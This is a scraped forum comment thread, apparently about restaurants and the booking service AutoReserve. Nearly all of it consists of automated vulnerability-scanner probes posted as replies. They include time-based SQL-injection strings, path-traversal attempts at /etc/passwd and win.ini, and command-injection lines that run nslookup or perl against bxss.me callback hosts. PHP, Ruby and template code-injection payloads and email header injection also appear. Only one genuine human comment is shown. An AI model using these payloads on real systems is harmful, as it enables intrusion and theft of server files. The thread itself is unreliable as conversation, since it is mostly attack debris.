unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141224

re: JJ

WEB-INF/web.xml

1727141225

re: JJ

WEB-INF\web.xml

1727141225

re: JJ

1

1727141658

re: JJ

1

1727141691

re: JJ

-1 OR 2+191-191-1=0+0+0+1 --

1727141692

re: JJ

-1 OR 3+191-191-1=0+0+0+1 --

1727141692

re: JJ

-1 OR 2+203-203-1=0+0+0+1

1727141692

re: JJ

-1 OR 3+203-203-1=0+0+0+1

1727141693

re: JJ

-1' OR 2+283-283-1=0+0+0+1 --

1727141693

re: JJ

-1' OR 3+283-283-1=0+0+0+1 --

1727141694

re: JJ

-1' OR 2+528-528-1=0+0+0+1 or 'bPQgTocz'='

1727141694

re: JJ

-1' OR 3+528-528-1=0+0+0+1 or 'bPQgTocz'='

1727141695

re: JJ

-1" OR 2+956-956-1=0+0+0+1 --

1727141695

re: JJ

-1" OR 3+956-956-1=0+0+0+1 --

1727141696

re: JJ

if(now()=sysdate(),sleep(15),0)

1727141711

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141723

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141733

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141745

re: JJ

-1; waitfor delay '0:0:15' --

1727141756

re: JJ

-1); waitfor delay '0:0:15' --

1727141767

re: JJ

1 waitfor delay '0:0:15' --

1727141776

re: JJ

1YVlLFWK'; waitfor delay '0:0:15' --

1727141785

re: JJ

-5 OR 86=(SELECT 86 FROM PG_SLEEP(15))--

1727141793

re: JJ

-5) OR 848=(SELECT 848 FROM PG_SLEEP(15))--

1727141801

re: JJ

-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--

1727141809

re: JJ

g2ZEU4DX' OR 433=(SELECT 433 FROM PG_SLEEP(15))--

1727141819

re: JJ

MIJuQAiO') OR 451=(SELECT 451 FROM PG_SLEEP(15))--

1727141835

re: JJ

j6qdBOWB')) OR 313=(SELECT 313 FROM PG_SLEEP(15))--

1727141843

re: JJ

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141856

re: JJ

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141868

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1727141883

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1727141897

re: JJ

1'"

1727141898

re: JJ

@@jEKdE

1727141900

re: JJ

1

1727383017

re: JJ

1

1727383026

re: JJ

1

1727383026

re: JJ

1

1727383578

re: JJ

1

1727383578

re: JJ

1

1727383579

I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.

1680634389 Reply
Add photos

re: mirugai

Fa1rpfNK

1697002538

re: mirugai

1*

1697002538

re: mirugai

1*

1697002538

re: mirugai

1*

1697002539

re: mirugai

1*

1697002539

re: mirugai

-1 OR 2+527-527-1=0+0+0+1

1697002539

re: mirugai

-1 OR 3+527-527-1=0+0+0+1

1697002539

re: mirugai

if(now()=sysdate(),sleep(15),0)

1697002543

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002549

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002554

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002559

re: mirugai

-1; waitfor delay '0:0:15' --

1697002563

re: mirugai

-1); waitfor delay '0:0:15' --

1697002568

re: mirugai

1 waitfor delay '0:0:15' --

1697002573

re: mirugai

DbGkXblK'; waitfor delay '0:0:15' --

1697002577

re: mirugai

-5 OR 481=(SELECT 481 FROM PG_SLEEP(15))--

1697002582

re: mirugai

q0spgWkk

1697002583

re: mirugai

1*

1697002583

re: mirugai

1*

1697002584

re: mirugai

1*

1697002584

re: mirugai

1*

1697002584

re: mirugai

-1 OR 2+595-595-1=0+0+0+1

1697002584

re: mirugai

-1 OR 3+595-595-1=0+0+0+1

1697002585

re: mirugai

-5) OR 536=(SELECT 536 FROM PG_SLEEP(15))--

1697002586

re: mirugai

if(now()=sysdate(),sleep(15),0)

1697002589

re: mirugai

-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))--

1697002590

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002593

re: mirugai

rmqL53ty' OR 198=(SELECT 198 FROM PG_SLEEP(15))--

1697002595

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002598

re: mirugai

H2EEREAj') OR 387=(SELECT 387 FROM PG_SLEEP(15))--

1697002600

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002602

re: mirugai

kWSxSl86')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--

1697002604

re: mirugai

-1; waitfor delay '0:0:15' --

1697002607

re: mirugai


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002609

re: mirugai

-1); waitfor delay '0:0:15' --

1697002612

re: mirugai


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002615

re: mirugai

1 waitfor delay '0:0:15' --

1697002617

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1697002619

re: mirugai

FAk2VVkd'; waitfor delay '0:0:15' --

1697002621

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1697002623

re: mirugai

1'"

1697002623

re: mirugai

@@TkNLW

1697002624

re: mirugai

-5 OR 462=(SELECT 462 FROM PG_SLEEP(15))--

1697002625

re: mirugai

-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--

1697002629

re: mirugai

-1)) OR 688=(SELECT 688 FROM PG_SLEEP(15))--

1697002634

re: mirugai

N4hkxoiD' OR 138=(SELECT 138 FROM PG_SLEEP(15))--

1697002639

re: mirugai

HTPbdLJj') OR 243=(SELECT 243 FROM PG_SLEEP(15))--

1697002643

re: mirugai

tALAVFO4')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--

1697002647

re: mirugai


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002652

re: mirugai


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002659

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1697002663

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1697002667

re: mirugai

1'"

1697002668

re: mirugai

@@Q5O6x

1697002669

re: mirugai

1MbbLEkrO

1727140540

re: mirugai

response.write(9979195*9016172)

1727140544

re: mirugai

'+response.write(9979195*9016172)+'

1727140545

re: mirugai

<esi:include src="http://bxss.me/rpb.png"/>

1727140545

re: mirugai

${10000429+9999663}

1727140545

re: mirugai

"+response.write(9979195*9016172)+"

1727140546

re: mirugai

%0abcc:074625.67-13555.67.df552.19990.2@bxss.me

1727140546

re: mirugai

to@example.com>%0d%0abcc:074625.67-13556.67.df552.19990.2@bxss.me

1727140547

re: mirugai

../../../../../../../../../../../../../../etc/passwd

1727140550

re: mirugai

../../../../../../../../../../../../../../windows/win.ini

1727140551

re: mirugai

file:///etc/passwd

1727140552

re: mirugai

'.gethostbyname(lc('hitxi'.'smgyzjdl57ef5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(86).chr(114).chr(82).'

1727140552

re: mirugai

)

1727140552

re: mirugai

../../../../../../../../../../../../../../../proc/version

1727140552

re: mirugai

".gethostbyname(lc("hityj"."nwetgdbme2875.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(86).chr(108).chr(71)."

1727140553

re: mirugai

!(()&&!|*|*|

1727140553

re: mirugai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140553

re: mirugai

^(#$!@#$)(()))******

1727140554

re: mirugai

../../../../../../../../../../etc/passwd%00.jpg

1727140554

re: mirugai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140555

re: mirugai

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140556

re: mirugai

echo xfelgt$()\ ycgrmq\nz^xyu||a #' &echo xfelgt$()\ ycgrmq\nz^xyu||a #|" &echo xfelgt$()\ ycgrmq\nz^xyu||a #

1727140556

re: mirugai

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140557

re: mirugai

&echo zbmakb$()\ vtzppg\nz^xyu||a #' &echo zbmakb$()\ vtzppg\nz^xyu||a #|" &echo zbmakb$()\ vtzppg\nz^xyu||a #

1727140557

re: mirugai

/etc/passwd

1727140557

re: mirugai

|echo ehifdq$()\ xojrry\nz^xyu||a #' |echo ehifdq$()\ xojrry\nz^xyu||a #|" |echo ehifdq$()\ xojrry\nz^xyu||a #

1727140557

1727140558

re: mirugai

"+"A".concat(70-3).concat(22*4).concat(108).concat(84).concat(121).concat(85)+(require"socket"
Socket.gethostbyname("hitks"+"ksuhoqirb6a28.bxss.me.")[3].to_s)+"

1727140558

re: mirugai

%2fetc%2fpasswd

1727140558

re: mirugai

(nslookup hitirokncmvir46b7e.bxss.me||perl -e "gethostbyname('hitirokncmvir46b7e.bxss.me')")

1727140558

re: mirugai

bxss.me/t/xss.html?%00

1727140559

re: mirugai

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140559

re: mirugai

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140559

re: mirugai

'+'A'.concat(70-3).concat(22*4).concat(121).concat(67).concat(114).concat(84)+(require'socket'
Socket.gethostbyname('hitha'+'lomughgk5319f.bxss.me.')[3].to_s)+'

1727140559

re: mirugai

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140559

re: mirugai

$(nslookup hitukyuzbtuou4bb98.bxss.me||perl -e "gethostbyname('hitukyuzbtuou4bb98.bxss.me')")

1727140559

1727140560

re: mirugai

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140560

re: mirugai

&nslookup hitzqaxvktexxa02d2.bxss.me&'\"`0&nslookup hitzqaxvktexxa02d2.bxss.me&`'

1727140561

re: mirugai

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140561

1727140561

re: mirugai

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140561

re: mirugai

&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&'\"`0&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&`'

1727140562

re: mirugai

';print(md5(31337));$a='

1727140562

re: mirugai

/etc/shells

1727140562

re: mirugai

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140562

re: mirugai

|(nslookup hitmcbecijwkn03691.bxss.me||perl -e "gethostbyname('hitmcbecijwkn03691.bxss.me')")

1727140563

re: mirugai

c:/windows/win.ini

1727140563

re: mirugai

";print(md5(31337));$a="

1727140563

re: mirugai

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140563

re: mirugai

`(nslookup hitlxmsmjmuvlab335.bxss.me||perl -e "gethostbyname('hitlxmsmjmuvlab335.bxss.me')")`

1727140563

re: mirugai

'"

1727140563

re: mirugai

bxss.me

1727140564

re: mirugai

${@print(md5(31337))}

1727140564

re: mirugai

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140564

re: mirugai

;(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")|(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")&(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")

1727140564

re: mirugai

<!--

1727140564

re: mirugai

${@print(md5(31337))}\

1727140565

re: mirugai

file:///etc/passwd

1727140565

re: mirugai

'.print(md5(31337)).'

1727140566

re: mirugai

/\../\../\../\../\../\../\../etc/passwd

1727140566

re: mirugai

/WEB-INF/web.xml

1727140567

re: mirugai

C:\WINDOWS\system32\drivers\etc\hosts

1727140568

re: mirugai

../../../../../../../../../../windows/win.ini%00.jpg

1727140569

re: mirugai

/../../../../../../../../../../boot.ini

1727140570

re: mirugai

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140571

re: mirugai

..\..\..\..\..\..\..\..\windows\win.ini

1727140572

re: mirugai

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140573

re: mirugai

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140574

re: mirugai

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140575

re: mirugai

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140576

re: mirugai

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.